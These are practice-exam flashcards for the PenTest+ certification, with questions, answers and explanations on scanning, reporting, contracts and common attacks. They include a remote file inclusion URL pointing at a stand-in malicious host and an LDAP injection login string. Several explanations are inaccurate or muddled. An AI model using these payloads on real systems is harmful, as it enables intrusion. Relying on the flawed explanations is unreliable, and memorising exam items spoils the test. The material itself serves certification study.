Cybrary Practice Exam Flashcards
You have ran an automated scan against the network at InterConn and found a number of vulnerabilities.
In an instance of LibreOffice Writer, you copy the vulnerabilities and look them up on https://cve.mitre.org/cve/ to see if you can find anything already reported on them.
For one of the vulnerabilities the response comes back
CVE-2019-17554
With a Date Entry created:
20191014
What from the above Data entry created is NOT indicated? (CHOOSE THREE)
A.Discovered B.Shared with vendor C.Reserved D.Disclosed publicly E.Allocated
A.Discovered
B.Shared with vendor
D.Disclosed publicly
Explanation:
The entry does NOT indicate the vulnerability is discovered, publicly disclosed or shared with the vendor.
According to CVE:
‘CVE IDs are used by cybersecurity product/service vendors and researchers as a standard method for identifying vulnerabilities and for cross-linking with other repositories that also use CVE IDs.
This date does not indicate when the vulnerability was discovered, shared with the affected vendor, publicly disclosed or updated in CVE.
That information may or may not be included in the description or references of a CVE Entry or in the enhanced information for the CVE Entry that is provided in the U.S. National Vulnerability Database (NVD).”
The “Date Entry Created” date in a CVE Entry indicates when the CVE ID was issued to a CVE Numbering Authority (CNA) or the CVE Entry was published on the CVE List.
“A CVE Entry is marked as “RESERVED” when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details of it are not yet populated. A CVE Entry can change from the RESERVED state to being populated, or Allocated, at any time based on a number of factors both internal and external to the CVE List. Once the CVE Entry is populated with details on the CVE List, it will become available in the U.S. National Vulnerability Database (NVD)”.
This particular entry has been allocated because all of the information has been populated. It is also reserved because it has been assigned to a particular vulnerability.
Common Vulnerabilities and Exposure (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, they are more of a dictionary than a database. CVE helps provide rankings on discovered vulnerabilities, but does not provide security compliance standards.
Objective:
Information Gathering and Vulnerability Identification
Sub-Objective:
Given a scenario, analyze vulnerability scan results.
References:
CompTIA PenTest+ Cert Guide, Chapter 3: Information Gathering and Vulnerability Identification, Understanding How to Analyze Vulnerability Scan Results
A penetration tester wants to run an Nmap script that will use MSRPC to enumerate user accounts on a target. Which script would be best for this scenario?
A.smb-enum-shares.nse
B.http-enum.nse
C.smb-enum-services.nse
D.smb-enum-users.nse
D.smb-enum-users.nse
Explanation:
The smb-enum-users.nse script enumerates all user accounts on a remote system. It uses the Microsoft Remote Procedure Call (MSRPC) protocol to perform the reconnaissance. MSRPC is a Microsoft client-server protocol that allows one program to request services of another machine without prior knowledge of the specific details of that machine’s internal network. From a pen test perspective, the information gained by using this protocol allows testers to build out an internal network and footprint specific users that exists on a remote system.
The smb-enum-shares.nse script retrieves information about remote shares. This technique can even display private files which is an opportunity for data exfiltration or malware propagation.
The smb-enum-services.nse script discovers services running on a remote system. The enumeration results, which can only be produced when running the scan from a privileged account, can also list service status (active or inactive).
The http-enum.nse script enumerates directories used by web applications and servers. It is an intelligent, highly accurate script capable of pattern recognition to identify specific version of web applications while avoiding false positive results.
Which of these options is NOT a risk management process?
A.Taking a new business risk B.Monitoring an existing risk C.Accepting the current level of risk D.Determining the organization’s tolerance for risk E.Taking action to reduce risk F.Calculating the current level of risk
A.Taking a new business risk
Explanation:
Taking a business risk is not a risk management process. It is the reason for risk management. All business activities carry some level of risk that must be faced to achieve rewards. Risk management is the attempt to ensure the business will benefit from potentially risky activities, such as managing customers’ financial data or acquiring new computer systems, without too much harm.
Determining the current level of risk faced by an organization, judging the organization’s appetite or tolerance for risk, accepting the current level of risk, and taking action to mitigate or avoid risk are all part of a risk management program.
Risk mitigation includes a combination of these strategies:
Risk monitoring, by continually gauging the current risks faced by the organization Risk avoidance, by modifying or stopping an activity or process that generates risk Risk reduction, by implementing countermeasures to protect against risk (such as cybersecurity) Risk sharing, by spreading the impact of the risk to another entity (such as hiring an outside firm to provide cybersecurity to the organization) Risk transference, by shifting the impact of the risk to another entity (such as buying insurance)
Compliance liability, which is defined by such federal regulations as GLBA, PCI-DSS, and HIPAA / HITECH, cannot be shared or transferred away from the organization. Organizations governed by these laws are always responsible for complying with their mandates. They cannot share or transfer this risk.
In a workstation you just gained remote access to, you find the following code:
super_list = [12, 21, 95, 45, 8, 100]
for number in super_list:
if number % 2 != 0:
print(number)
What is the first output?
A.45
B.21
C.12
D.95
B.21
Explanation:
The first output of this code is 21. This code determines which numbers within the list are odd. The for loop loops through the numbers within the list. The if statement then determines whether or not the number is evenly divisible by two. If it is not (meaning that the number is an odd number), then the number prints.
The first output is not 12 because 12 is an even number.
The first output is not 95, which will be the second output.
The first output is not 45, which will be the third output.
The code will provide output as follows: 21, 95, 45.
A penetration tester performs a security assessment for your company. When you examine the final report, seven vulnerabilities are listed. Four of the vulnerabilities are critical. However, your company does not have the resources to remediate all of the vulnerabilities listed in the report at the moment. You need to suggest which vulnerabilities should be addressed.
What should you recommend?
A.Implement the remediation for the most critical vulnerability first.
B.Implement the cheapest remediations first.
C.Implement the remediations that are easiest to implement first.
D.Implement the remediations that affect the most assets first.
A.Implement the remediation for the most critical vulnerability first.
Explanation:
You should recommend that the company implement the remediation for the most critical vulnerability first. The criticality of a vulnerability is based on a number of factors, including ease to exploit, value of affected asset, exposure of affected asset, and so on. Critical vulnerabilities should be handled first if there are limited resources available.
You should not implement the cheapest remediations first. Although this would allow your resources to be stretched, it would not ensure that the most critical vulnerabilities are addressed. The most critical vulnerabilities are those most likely to be exploited and most likely to cost the most if exploited.
You should not implement the remediations that affect the most assets first. While these remediations would seem like a logical choice because of the number of affected assets, these may not be the most critical. The most critical vulnerabilities should always have priority.
You should not implement the remediations that are easiest to implement first. Just because they are easy is not reason enough to implement them first. Often the easiest remediations are not addressing the most critical vulnerabilities. Always address the most critical first.
You are working for a contracting company that was employed by the federal government. Which organization’s publications are likely to be most closely related to your security compliance standards?
A.NIST
B.CVE
C.JPCERT
D.US-CERT
A.NIST
Explanation:
The National Institute of Standards and Technology (NIST) is an agency of the U.S Department of Commerce. Its main focus is to promote innovation and assessing organizations in the risk they encounter. Their publications will be most closely related to your security compliance standards.
Japan Computer Emergency Response Team (JPCERT) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. They also gather and disseminate technical information on computer security incidents and vulnerabilities and security fixes, and other security information, as well as issue alerts and warnings.
The U.S. Computer Emergency Readiness Team (US-CERT) is an organization that was established by the U.S. Department of Homeland Security to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. However, they do not provide security compliance standards.
Common Vulnerabilities and Exposure (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, they are more of a dictionary than a database. CVE helps provide rankings on discovered vulnerabilities, but does not provide security compliance standards.
A penetration tester has been hired to perform a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five of them identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Which of the following would be the BEST suggestion for the client?
A.Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities
B.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.
C.Identify the issues that can be remediated most quickly and address them first.
D.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
B.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time.
Explanation:
The client should fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. Correcting the most critical vulnerability would prevent an attacker from remotely compromising a system easily and possibly obtaining full control.
If the startup firm corrected the least impactful, quickest, or easiest vulnerabilities, then an attacker might be able to control and steal vulnerable information because the most critical vulnerabilities may not be handled.
Which of the following attacks can be prevented by properly shredding all sensitive documents?
A.Fence Jumping
B.Dumpster Diving
C.Tailgating
D.Piggybacking
B.Dumpster Diving
Explanation:
Dumpster diving occurs when someone goes through the trash in the dumpster looking for printed matter that might be helpful in an attack, such as network diagrams, phone lists, and organizational charts. It is best addressed by shredding all sensitive documents.
Piggybacking cannot be prevented by shredding all sensitive documents. Piggybacking is a social engineering attack that involves entering a facility which you are not authorized to enter by doing so when an authorized person opens the door using their credentials stored on a key card.
Fence jumping cannot be prevented by shredding all sensitive documents. This can only be done by making the fence tall enough to discourage a determined attacker. Another option is to have the top of the fence strung with razor wire.
Tailgating cannot be prevented by shredding all sensitive documents. Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who has opened the door with their credentials knows the individual following them in through the secure door. Tailgating means that an individual following through the door is unknown by the person with credentials.
You want to share the results of your Nmap with other members of your team. Which parameter stores scan results in Normal, XML, and Grep-able formats?
A.-oG
B.-oA
C.-oX
D.-oN
B.-oA
Explanation:
The -oA parameter of the Nmap stores outputs in Normal, XML, and Grep-able output formats all at once. The following exhibit shows an example of this command:
The -oX parameter of the Nmap command changes the output behavior to an XML output. XML is easily parsed by software, which makes it preferred for many applications. The following is an example of this command:
The -oN parameter of the Nmap command changes the output behavior to a normal output. It is meant for human users to read, and the output will be analyzed. The following is an example of this command:
The -oG parameter of the Nmap command changes the output behavior to a Grep-able output. This format is easy to manipulate with simple Unix tools. The following is an example of this command:
Which of the following is NOT likely to be carried out after a penetration test is completed?
A.Remove the tools installed during the test.
B.Remove accounts created for the test.
C.Disable all services used during the test.
D.Remove shells created during the test.
C.Disable all services used during the test.
Explanation:
Disabling all services used during the test is NOT likely to be carried out after a penetration test is completed. You should only disable those services that were explicitly enabled for the penetration test. All other services will likely be valid services running in the enterprise.
You should perform the following actions after completing a penetration test:
Remove shells created during the test. Remove accounts created for the test. Remove the tools installed during the test.
Recently you heard of an organization that suffered a man-in-the-middle attack leveraging fake certificates. You would like to use a technique that always verifies that the name on the certificate matches the name of the system attempting to use the certificate. What is this technique called?
A.DNSSEC
B.OCSP
C.certificate pinning
D.wildcard certificates
C.certificate pinning
Explanation:
Certificate pinning is a technique performed by a software client to authenticate public keys and help protect against man-in-the-middle attacks. It verifies that the CA name and/or the host name matches that on the certificate.
Domain Name System Security Extension (DNSSEC) is a form of DNS that makes additional checks of name resolutions. DNSSEC adds two important features to the DNS protocol, but does not prevent certificate issues.
Data origin authentication Data integrity protection
Wildcard certificates are used to certify the identity of devices and users in multiple sub-domains of a domain. It is not used to enhance certificate security.
Online Certificate Status Protocol (OCSP) is an Internet protocol used to check the status of a certificate in real time, as opposed to using CRLs. It does not address the certificate issues described in the scenario.
To perform network reconnaissance, you use Nmap to perform a SYN scan. After completing this scan, you want to create more custom packets and gain more control over the traffic you are sending. Which tool should you use to do this?
A.DNSrecon
B.Scapy
C.Metasploit
D.Recon-ng
B.Scapy
Explanation:
Scapy is a program in which enables users to create, adjust, modify, and send network packets. It allows the user to gain more control over the packets being sent.
Recon-ng is a tool built to conduct the initial phase in reconnaissance of an offensive security exercise. With Recon-ng you can configure options, perform recon and output results to different report types.
Metasploit is a framework used in penetration testing that probes systematic vulnerabilities on networks and servers.
DNSrecon is a tool used for DNS-oriented information gathering. It can perform various enumerations, such as zone transfers, domain brute force, and wildcard resolution.
You are attempting to execute an SNMP sweep. After identifying the correct SNMP community string, you find that several live systems do not respond.
Which of the following is NOT a reason a device may not respond?
A.The system is firewalled.
B.The system is offline.
C.An incorrect community string is being used.
D.The TCP three-way handshake is not completing.
D.The TCP three-way handshake is not completing.
Explanation:
Simple Network Management Protocol (SNMP) does not use the TCP protocol. Therefore, a failure of the three-way handshake is not a possible reason a device may not respond. SNMP uses UDP, not TCP.
Valid reasons why a system may not respond are:
An incorrect community string is being used. The system is offline. The system is firewalled. The SNMP service is disabled.
You want to engage a pen testing company for a series of tests to be performed over the next two years. You do not want to negotiate with the company for each individual test. What type of document could you execute?
A.NDA
B.SOW
C.MSA
D.Rules of Engagement
C.MSA
Explanation:
A master services agreement (MSA) is used to set parameters for ongoing tests, each with their own SOW. Having a MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients, and that companies can quickly create new SOWs with an established pen testing organization.
The statement of work (SOW) defines a number of details concerning a pen test, and must be unique to every pen test performed. It includes:
Timelines, including the report delivery schedule Scope of the work to be performed Location of the work (geographic location or network location) Technical and nontechnical requirements Cost of the penetration tests Payment schedule
The non-disclosure agreement (NDA), which is signed by the tester, requires the tester to keep all company information private. It does not address the details of individual tests.
The rules of engagement specifies allowed actions and allowed targets for an individual test. Its parameters are more specific than those contained in a MSA.
A network security analyst for the U.S Department of Defense (DoD) is looking to gain information about a foreign adversary. What method should be used FIRST to collect and analyze information on this target?
A.Packet crafting
B.OSINT
C.Vulnerability Scanning
D.Port Scanning
B.OSINT
Explanation:
Open source intelligence (OSINT) refers to information collection without the need for any covert methods. This is often a good first step in reconnaissance or threat hunting. Typically, the information could be found on the Internet, and this type of collection can often start with a simple Google search.
Vulnerability scanning is running a tool against a target to see what vulnerabilities, or weaknesses, it may hold. A scanner will often actually use a tool like Nmap to perform the port scan process.
Packet crafting is the process of generating packets to test network devices. Packets are crafted to test IDS, TCP, Firewall, etc. It also helps to find inconsistencies and poor network protocol implementations.
Port scanning is a method to look for open, closed, or filtered ports. An open port represents an avenue into a network. That’s why it’s important to close any unnecessary or unused ports as part of the system hardening process.
You performed a pen test for a retail organization that processes credit card information. During the test you identified several sensitive credit card items were stored with other data that was widely available to users. What concept required by PCI-DSS would rectify this situation?
A.intrusion prevention systems
B.next generation firewalls
C.network segmentation
D.key management
C.network segmentation
Explanation:
Network segmentation, also referred to as data isolation, is one of the key requirements of PCI-DSS and calls for sensitive credit card data, such as PANs, to be stored apart from other sensitive items. In this way, if there is a breach, not every sensitive item can be readily available.
In general, when dealing with any compliance-based pen test, the penetration tester should verify the presence of the following best practices:
Data isolation Secure key management Proper password policies
While next generation firewalls and intrusion prevention systems are certainly an advisable addition to any network holding sensitive data, it is not one of the requirements of PCI-DSS. The main goals of the PCI-DSS standard are as follows:
Build and Maintain a Secure Network Protect Cardholder Data Maintain a Vulnerability Management Program Implement Strong Access Control Measures Regularly Monitor and Test Networks Maintain an Information Security Policy
Your company carries out a penetration test on a regular basis. You are currently reviewing the report from the most recent penetration test. However, you recognize most of the findings as those that were reported in the last penetration test report. What does this indicate?
A.Different tools were used to perform the most recent penetration test.
B.The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test.
C.The current penetration test was not properly completed.
D.A different contractor was used to perform the most recent penetration test.
B.The appropriate mitigations for the vulnerabilities were not deployed after the last penetration test.
Explanation:
If you recognize most of the findings in the report as those that were reported in the last penetration test report, then the appropriate mitigations for the vulnerabilities were not deployed after the last penetration test. If the mitigations had been deployed, the majority, if not all, of those vulnerabilities should be absent from the most recent report.
Using a different contractor or different tools would not cause the same vulnerabilities to show up. Often different contractors and tools are used to increase the likelihood that all vulnerabilities are discovered.
Discovering many of the same vulnerabilities as the last penetration test is not an indication that the penetration test was not properly completed. An improperly completed test is likely to show few to no vulnerabilities.
After completing a penetration test and reviewing the results, it is important for a company to ensure that mitigations are deployed for the vulnerabilities reported in the findings section. Failure to do so is negligent and can result in legal issues. Companies should implement a time frame wherein all mitigations should be implemented.
You want to detect the services running on a targeted host. Which of the following is the correct Nmap command?
A.nmap -sU -T4 192.168.1.1
B.nmap -sV-T4 192.168.1.1
C.nmap -sS -T4 192.168.1.1
D.nmap -sT -T4 192.168.1.1
B.nmap -sV-T4 192.168.1.1
Explanation:
The Nmap service identification command uses the -sV parameter. This gives information on which services are running, including mail or DNS server services. This could help determine the exploits to which a server could be vulnerable.
The -sS parameter of the Nmap command performs a SYN scan. It is an active scan which sends a TCP SYN packet, and does not require a full connection. Depending on the response (or lack thereof), you can determine the status of a port. The following graphic is an example of this command:
The -sT parameter of the Nmap command performs a TCP connect scan. It establishes a full TCP connection with the target. It is the default Nmap scan type when no command is specified. It should only be used when the user does not have permission to read/write raw packets. The following exhibit shows this command:
The -sU parameter of the Nmap command performs a UDP scan. It is used to enumerate DNS, SNMP, or DHCP servers, all of which require UDP packets for communication. The following exhibit shows this command:
A large retail company has hired a white-hat hacker to perform testing in order to detect vulnerabilities in the system. What technique would this hacker use to gather information in the most discreet manner possible?
A.Passive reconnaissance
B.OSINT
C.Active reconnaissance
D.Topology
A.Passive reconnaissance
Explanation:
Passive reconnaissance is a method of gathering information without interacting with the system, leaving little or no trace. This may include activities such gleaning information from publicly available resources.
Active reconnaissance is a method which requires the tester to interact with a target system in order to gain information. This method can be very helpful, but there is risk of detection.
While open source intelligence (OSINT) may be used in passive reconnaissance. it is not a type of reconnaissance method. A webpage can be used to gather more information about a target. For example, the tester can search a public website for key company employee’s names and positions, employee emails and other contact information, technical job openings which may reveal the type of network equipment or other valuable information. These are all details which aid the tester in passive reconnaissance and exploitation.
The network topology is a byproduct that will be learned about during the process of reconnaissance but it is not a reconnaissance technique itself.
The board is discussing the benefits of having a pen test performed. One of the members is concerned that the danger of the pen tester leaking information may outweigh the benefits of the test. What document could help allay these fears?
A.Permission to test document
B.SOW
C.NDA
D.MSA
C.NDA
Explanation:
The non-disclosure agreement (NDA), signed by the tester, requires the tester to keep all company information private.
The permission to test document is a critical document that explicitly authorizes you to attempt to penetrate the client’s network, system, or devices. These documents typically include the dates for which the permission is valid, the locations and types of systems to be penetrated, and the full title of the person authorized to grant permission. Its purpose is not to address confidentiality.
A master services agreement (MSA) is used to set parameters for ongoing tests, each with their own SOW. Having a MSA on file means that penetration testers do not need to renegotiate terms for every test with established clients, and that companies can quickly create new SOWs with an established pen testing organization.
The statement of work (SOW) defines a number of details concerning a pen test, and must be unique to every pen test performed. It includes:
Timelines, including the report delivery schedule Scope of the work to be performed Location of the work (geographic location or network location) Technical and nontechnical requirements Cost of the penetration tests Payment schedule
- occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver
- occurs when IP addresses and host names are given out with the goal of traffic diversion
- occurs when a hacker tries all possible values for such variables as user names and passwords
- occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network
A. Brute force attack
B. DNS poisoning
C. Man-in-the-middle attack
D. Smurf
- C
- B
- A
- D
The attacks should be matched with the descriptions in the following manner:
Brute force attack - occurs when a hacker tries all possible values for such variables as user names and passwords DNS poisoning - occurs when IP addresses and host names are given out with the goal of traffic diversion Man-in-the-middle attack - occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver Smurf - occurs when a combination of Internet Protocol (IP) spoofing and Internet Control Message Protocol (ICMP) messages saturates a network
DNS poisoning is similar to ARP poisoning. With ARP poisoning, an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages on a network with the goal of traffic diversion.
You want to employ a Linux distribution mainly aimed at network security monitoring. Which Linux distribution would BEST support network security monitoring?
A.Skadi
B.DEFT
C.ADIA
D.Security onion
D.Security onion
Explanation:
Security Onion is a Linux distribution mainly aimed at network security monitoring. It also has other advanced forensic analysis tools.
The answer is not Skadi. Skadi is an all-in-one solution for parsing collected data. This makes the data easily searchable and allows for the searching through multiple hosts simultaneously.
The answer is not Appliance for Digital Investigation and Analysis (AIDA). AIDA is an appliance with many tools aimed for digital investigation/acquisition. It is VMware-based.
The answer is not the Digital Evidence and Forensics Toolkit (DEFT). This tool is a Linux distribution mainly aimed for the collection of computer forensic evidence.
After being engaged by a client, you executed a SOW to perform a pen test. During the test, you were asked by the client to test an additional system that was not included in the original SOW. The original SOW was not revised and signed, and a new SOW was not executed. If you tested the additional system, what has occurred?
A.corruption of results
B.test dilution
C.task bleed
D.scope creep
D.scope creep
Explanation:
Pen tests are planned and carried out as formal projects. In project management, scope creep occurs when the original project plan is not followed precisely. It typically indicates the addition of tasks or initiatives not included in the original plan scope.
Usually when things are added to the project’s scope, it can be because the client is really happy with how it’s going. But it is essential that when this occurs, the original SOW is updated or a new one is executed to document the additional work. Also, do not be afraid to ask for additional funding when tasks are added to your scope.
Task bleed and test dilution are not terms used when discussing project management and pen tests.
You need to perform a penetration test. You have decided to use an automated vulnerability scanner. What should you check for when the test is complete?
A.False positives
B.Speed and frequency
C.People’s feelings
D.Detection
A.False positives
Explanation:
A.False positives
Communication details are contained in the penetration test’s engagement plan. One of the members of the penetration testing team wants to ensure that they understand the appropriate communication triggers.
Which of the following is NOT a communication trigger?
A.Unexploited findings
B.Indicators of compromise
C.Completion of a testing stage
D.Critical findings
A.Unexploited findings
Explanation:
Unexploited findings is NOT a communication trigger. This information would be contained in the final report.
Communication triggers include: stages of the penetration test, critical findings, and indicators of compromise. These are standard communication triggers. Some organizations may include other communication triggers as part of the engagement plan. It is important that the penetration tester understands these triggers and acts accordingly.
- WEP/WPA cracking
- Warchalking
- Evil twin
A.A rogue access point is configured with the same SSID as a valid access point.
B.Mathematical algorithms are used to determine the pre-shared key used on the access point.
C.SSID and other authentication details regarding a wireless network are placed in a prominent place.
1B
2C
3A
The wireless security issues should be matched with the descriptions in the following way:
WEP/WPA cracking - Mathematical algorithms are used to determine the pre-shared key used on the access point. This is considered a WEP/WPA attack. Warchalking - SSID and other authentication details regarding a wireless network are written down in a prominent public place. Evil twin - A rogue access point is configured with the same SSID as a valid access point.
When performing a compliance-based assessment, which of the following will present the largest challenges to obtaining complete results?
A.lack of assessment tools
B.limited time spent on assessment
C.limited network access
D.limited knowledge by assessor
C.limited network access
Explanation:
n many compliance-based assessments, restrictive rules of engagement, specifically those that limit the areas of testing, are the biggest impediment to good results. Another key problem can be limited access to certain storage areas.
There is no lack of assessment tools available to perform a good assessment. That is not the biggest impediment to good results.
While the knowledge and skill of the assessor will certainly have an effect on results, history has not shown this to be the biggest impediment to good results.
Finally, while there must be proper time given for the assessment, lack of time is not typically the main issue with incomplete results of a compliance-based assessment.`
While performing a penetration test, you encounter several issues that you plan to document in the final report. However, you need to ensure that management is immediately notified of any critical issues documented in the communication escalation path.
Which of the following is MOST likely to result in immediate communication to management?
A.Unpatched applications exist on a system marked for retirement.
B.A finding was discovered regarding an out-of-scope system.
C.A network compromise has previously occurred about which management knows nothing.
D.Encrypted personally identifiable information (PII) was discovered on several systems.
C.A network compromise has previously occurred about which management knows nothing.
Explanation:
Of the situations given, only the network compromise that has previously occurred about which management knows nothing should be immediately reported to management.
None of the other findings are critical, nor are they indicators of compromise. Critical findings and indicators of compromise are the only discoveries that should trigger communication, unless otherwise noted in the communication escalation directions.
Issues with out-of-scope systems should be noted in the final report. However, out-of-scope systems should not be thoroughly tested. Often you may accidentally discover an issue with an out-of-scope system, but issues with out-of-scope systems should only be reported and not investigated further unless priorities change.
Encrypted PII will often exist on multiple systems. However, encrypted PII is usually considered protected (unless a compromised encryption algorithm is being used). This issue would be included in the final report and only considered critical if 1) the PII should not be on the system on which it was discovered, or 2) the encryption algorithm being used to protect the PII has been compromised or is no longer considered secure.
Unpatched applications may exist on systems marked for retirement. However, this is usually not a critical issue because systems marked for retirement are often not updated regularly. The tester should note the discovery in the final report and should instruct the organization that the soon-to-be retired system should be updated if retirement does not take place in the near future (next three months or so).
Communication triggers should include: critical findings, stages, and indicators of prior compromise. All other discoveries should simply be included in the final report.
Sam is reviewing web server logs after an attack. He discovers that many records contain semicolons and apostrophes in queries from end users. What type of attack should Sam suspect?
A.Cross-site scripting
B.LDAP injection
C.Buffer overflow
D.SQL injection
D.SQL injection
Explanation:
In an SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (‘) are characteristics of these attacks. For example, the single quote in SQL is a limiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than allowed.
Lightweight Directory Access Protocol (LDAP) Injection is an attack that send malicious LDAP queries to a web application that could result in sensitive data disclosure or authentication bypass.
Cross-site scripting (XSS) attacks are a type of injection attack where a malicious script is injected into a website. Because the attacker is feeding the script into a trusted website, the end user’s browser has no way to know that the script is malicious and will execute the script.
A buffer overflow attack revolves around malicious code requiring more memory than is allocated by a buffer. (A buffer is a memory allocation that is designed to hold a finite amount of data.) In other words, the attacker is trying to write more data into an application’s pre-built buffer than it was intended to hold. When an attacker can add data that exceeds the buffer limits, the extra information spills over past the buffer, into adjacent memory where it can then crash the system or execute malicious code.
Which of the following attack types takes advantage of an electronic door opening from the inside when someone approaches?
A.shoulder surfing
B.piggybacking
C.egress sensor attack
D.fence jumping
C.egress sensor attack
Explanation:
An egress sensor attack takes advantage of an electronic door opening from the inside when someone approaches. It does not use shimming but usually uses an “under the door tool” to cause an electronic door to open due to motion on that side of the door.
Fence jumping is exactly what it sounds like. This can only be prevented by making the fence tall enough to discourage a determined attacker. Another option is to have the top of the fence strung with razor wire.
Shoulder surfing is the unauthorized viewing of sensitive information on another user’s screen.
Piggybacking is a social engineering attack that involves entering a facility which you are not authorized to enter by doing so when an authorized person opens the door using their credentials stored on a key card.
Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who has opened the door with their credentials knows the individual following them in through the secure door. Tailgating means that an individual following through the door is unknown by the person with credentials.
You are preparing a penetration report. One of the findings indicated that a system is susceptible to SQL injection attacks.
Which of the following mitigation strategies should you recommend?
A.Implement a password complexity policy.
B.Sanitize user input.
C.Implement multi-factor authentication.
D.Harden the SQL server.
B.Sanitize user input.
Explanation:
You should recommend that the company sanitizes user input to prevent SQL injection attacks. You could also recommend that the company parameterizes queries.
Implementing a password complexity policy is the appropriate remediation if you discover that weak passwords are being used, which is not the case here.
Implementing multi-factor authentication is the appropriate remediation if you discover that only a single type of authentication is being used. Multi-factor authentication can include: something you know (username and password), something you have (smart card), something you are (biometrics), somewhere you are (GPS or particular host), and something you do (signature dynamics or typing patterns).
Hardening the SQL server is the appropriate remediation if you find unnecessary open services. Hardening steps include:
Remove unnecessary services and applications. Remove unnecessary accounts. Close unnecessary ports. Implement patch management. Deploy security templates and group policies. Implement configuration baselines using network access control.
While attacking InterConn’s network, you see an attack vector against their server using the following address:
http://example.interconn.com/example.php?file=http://www.malicious-example.com/malicious.php
What attack is being used here?
A.SQL injection
B.XSS
C.Directory traversal
D.RFI
D.RFI
Explanation:
Remote file inclusion (RFI) is being used here. RFI is an attack vector that was more popular several years ago, but unfortunately people and companies are still lazy about sanitizing PHP: Hypertext Preprocessor (PHP). PHP is a general-purpose programming language used with HTML to create web sites. You can still find ways of running shells in the scenario being described.
File inclusions themselves are normal, and useful, parts of a server-side scripting language. They are there to help in maintenance, update, and for code-editing. They are there also to allow web applications to pull and read files from the server’s file system. They are vulnerable to LFI and RFI attacks.
Local file inclusion (LFI) and remote file inclusion (RFI) are similar to the nefarious cross site scripting (XSS) attacks. All of them are forms of code injection, with LFI being less sophisticated and therefore easily preventable. RFI is a method which allows an attacker to employ a script to include a remotely hosted file on the web server. LFI is very similar to RFI, the only difference being that to carry out the LFI attack, the attacker has to use local files on the current server, and RFI uses remote files.
This is not a directory traversal attack. Directory traversal is a way of gaining unauthorized file system access. In a directory traversal attack, also known as path traversal, an attacker enters information in a web form, URL address line, or another input method that gives them access to a file or directory that they shouldn’t have access to, such as adding some periods and a backslash into the address to get to the parent directory.
This is not a cross-site scripting (XSS) attack because XSS is a code injection attack that targets web application input and client-side scripting vulnerabilities. It comes in many flavors such as the more common versions: Stored cross-site scripting (XSS) or persistent XSS, and it occurs when someone has implanted malicious code into the site that is always run when someone accesses that website. The attacker usually accesses the site via login, message board, or some other type of input.
A SQL injection is a type of injection attack in which malicious SQL statements are injected into an input field in a web request and executed on a database server.
A log analysis reveals the following input into a login portal:
Jsmith2)(&)
Admin1
Which type of attack has most likely occurred?
A.Brute Force
B.LDAP Injection
C.XSS
D.SQL Injection
B.LDAP Injection
Explanation:
This is an LDAP injection attack. Because LDAP is a protocol that is often used for authentication, the above is an example of an LDAP injection to bypass authentication.
Lightweight Directory Access Protocol (LDAP) Injection is an attack that send malicious LDAP queries to a web application that could result in sensitive data disclosure or authentication bypass. The & symbol will end the query after the first line. So, the attacker is trying to create a condition that effectively asks the back end database “check to see if we have a valid user named Jsmith2”. If so, allow for authentication. The attacker doesn’t need to enter a proper, matching password since the query is ended prematurely.
A brute force attack is a technique used to figure out a user’s credentials by trying every possible combination until it cracks the user’s credentials.
Cross-site scripting (XSS) attacks are injection attacks where malicious script is injected into a website. Because the attacker is feeding the script into a trusted website, the end user’s browser has no way to know that the script is malicious and will execute the script. An example of a cross site script would be Deface();.
In a SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (‘) are characteristics of these attacks. For example, the single quote in SQL is a limiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than allowed.
Your network contains an Active Directory domain named nutex.com. The network has a Windows Server 2012 server, named DNS1, that has the AD DS and the DNS server roles installed. You have several visitors and guests visit your office. You notice that users that are not part of the domain are registering A records in the nutex.com zone.
You need to prevent computers that are not members of the domain from registering with DNS. Which PowerShell script should you run?
A.Set-DnsServerPrimaryZone -Name “nutex.com” -DynamicUpdate “Secure”
B.Set-DnsServerPrimaryZone -Name “nutex.com” -ReplicationScope “Forest”
C.Set-DnsServerPrimaryZone -Name “nutex.com” -SecondaryServers 10.0.0.2
D.Set-DnsServerPrimaryZone -Name “nutex.com” -DynamicUpdate “NonsecureAndSecure”
A.Set-DnsServerPrimaryZone -Name “nutex.com” -DynamicUpdate “Secure”
Explanation:
You should run the Set-DnsServerPrimaryZone -Name “nutex.com” -DynamicUpdate “Secure” command from PowerShell. This command will specify that the nutex.com zone should allow only secure dynamic updates, rather than secure and nonsecure updates. Secure dynamic updates prevent users who are not members of the domain from registering in the zone.
If you had a user who was in a workgroup with the same name as the zone and the zone was configured for dynamic updates, then the user’s computer could register a host record in the zone. In this scenario, you know the zone is stored on a server that is also a domain controller because it has the AD DS role installed. A DNS server that is a domain controller can have a zone that is an Active Directory-integrated zone. An Active Directory-integrated zone can support secure dynamic updates, which only allow computers that are members of the domain to create a host record in the zone.
All other answers are incorrect, because they do not change the properties of the zone to only support secure dynamic updates.
